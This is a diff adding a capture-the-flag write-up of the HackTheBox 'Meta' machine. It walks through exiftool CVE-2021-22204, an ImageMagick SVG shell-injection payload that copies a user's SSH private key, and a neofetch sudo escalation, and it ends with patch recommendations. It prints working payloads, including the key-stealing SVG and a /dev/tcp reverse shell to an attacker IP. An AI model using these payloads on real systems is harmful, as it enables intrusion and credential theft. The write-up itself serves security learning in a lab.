add: writeup-ctf

content/writeup-ctf/writeup-meta-htb/index.md

@@ -0,0 +1,153 @@
+---
+title: "Writeup - Meta (HTB)"
+date: 2022-04-03
+slug: "writeup-meta-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Meta](https://app.hackthebox.com/machines/Meta) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.129.119.94
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.9p1)
+- 80/tcp : HTTP web server (Apache httpd)
+
+![](img/image-2.webp)
+
+## Exploit
+
+At first I order by listing the different pages of the site.
+
+![](img/image-3.webp)
+
+Nothing in particular, I continue by making an enumeration of the subdomains.
+
+![](img/image-4.webp)
+
+Ok, there is a subdomain, I add it to the `/etc/hosts` file, then I access it via a browser.
+
+![](img/image-5.webp)
+
+It is a page that redirects us to another page that contains a form to upload a file.
+
+![](img/image-6.webp)
+
+So I try to upload an image to see what the page tells me:
+
+![](img/image-7.webp)
+
+The result reminds me strongly of a crypto tool I already used: `exiftool`.
+
+![](img/image-8.webp)
+
+So I know that on the server side, this tool is used, it's a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this [github](https://github.com/convisolabs/CVE-2021-22204-exiftool).
+
+It is a tool for image modification and reverse shell insertion.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ python3 exploit.py
+    1 image files updated
+```
+Once the image is modified, I upload it and it creates the reverse shell:
+
+![](img/image-9.webp)
+
+I look for the location of the flag with the following command:
+
+
+```bash
+find / -name user.txt 2>/dev/null
+```
+I find that the flag is in `thomas` personal file, but I don't have the rights to read it...
+
+So I am looking for a way to change the user. In the site folder, I find a folder `convert_image`... It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system:
+
+
+```bash
+www-data@meta:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null
+<ert_images$ find / -name convert_image* 2>/dev/null     
+/usr/local/bin/convert_images.sh
+/var/www/dev01.artcorp.htb/convert_images
+```
+There is a script with the same name! Looking at the content, I can see that it uses the `[mogrify](https://linux.die.net/man/1/mogrify)` service to perform the conversion of the images in the folder.
+
+
+```bash
+#!/bin/bash
+cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
+pkill mogrify
+```
+I look for the version of the service with the following command:
+
+![](img/image-10.webp)
+
+Then I look if there are some feats. After some research I find this [exploit](https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html). It allows to do a shell injection in an SVG image.
+
+So I use the template provided in the article, then I modify it to get the content of the `id_rsa` file of the user `thomas`.
+
+
+```bash
+<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/id`;"'>
+  <read filename="pdf:/etc/passwd"/>
+  <get width="base-width" height="base-height" />
+  <resize geometry="400x400" />
+  <write filename="test.png" />
+  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
+  <image xlink:href="msl:poc.svg" height="100" width="100"/>
+  </svg>
+</image>
+```
+Then I copy the file to the `convert_images` folder. After a few seconds I find the newly created file in the `/dev/shm`.
+
+Now that I have this file, I add the privileges and create an SSH session:
+
+![](img/image-11.webp)
+
+I now have a shell as `thomas` and I get the first flag.
+
+## Privilege escalation
+
+I start by checking the sudo permissions of my user. I notice 2 things:
+
+- I have the right to use the command `/usr/bin/neofetch \"\"` as root
+- The environment variable `XDG_CONFIG_HOME` is kept when running sudo
+
+![](img/image-12.webp)
+
+After some research, I find that `neofetch` has a file in configuration in the folder `~/.config/neofetch/`. So I start by putting a reverse shell in this config file.
+
+
+```bash
+thomas@meta:~/.config/neofetch$ cd .config/neofetch/
+thomas@meta:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/10.10.14.40/2345 0>&1" > config.conf
+```
+Then I set the variable `XDG_CONFIG_HOME` with the `.local` of my user. Then I run `neofetch` as sudo.
+
+
+```bash
+thomas@meta:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config"
+thomas@meta:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\"
+```
+I now have a reverse shell `root` and I can get the last flag.
+
+![](img/image-13.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update `exiftool` to avoid CVE-2021-22204
+- Update `mogrify` to avoid shell injection exploit
+- Disable the option to keep the`XDG_CONFIG_HOME` variable at runtime with sudo